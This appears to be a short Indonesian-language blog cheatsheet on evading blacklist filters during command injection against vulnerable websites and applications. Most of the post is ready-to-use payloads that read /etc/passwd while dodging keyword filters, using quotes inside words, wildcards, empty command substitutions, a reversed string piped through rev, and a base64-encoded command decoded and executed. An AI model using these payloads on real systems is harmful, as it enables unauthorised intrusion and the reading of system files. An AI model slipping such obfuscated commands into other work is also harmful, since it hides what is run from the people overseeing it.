Command Injection Bypass Cheatsheet

Command Injection Bypass Cheatsheet. Adakalanya saat kita melakukan command injection pada website atau aplikasi yang rentan command atau perintah yang kita kirim diblock karena mengandung kata yang sudah diblacklist. nah di tutorial ini saya akan sharing bagaimana caya membypass blacklist tersebut.

Command Injection Bypass Cheatsheet

Di contoh ini saya menggunakan perintah untuk melihat /etc/passwd .

Normal command :

cat etc/passwd

Command with Quote

cat /e"t"c/pa"s"swd
cat /'e'tc/pa's'swd

Wildcard

cat /etc/pa??wd
cat /etc/pa*wd

Null variable

cat /et``c/passw``d
cat /et$()c/pa$()sswd
cat /et${neko}c/pas${poi}swd

Reverse & Encode command

`echo "dwssap/cte/ tac" | rev`
$(echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d)

Oke mungkin sekian sharing kali ini, jika ada yang ingin ditambahkan silahkan komentar.

Shares

One Response

Leave a Reply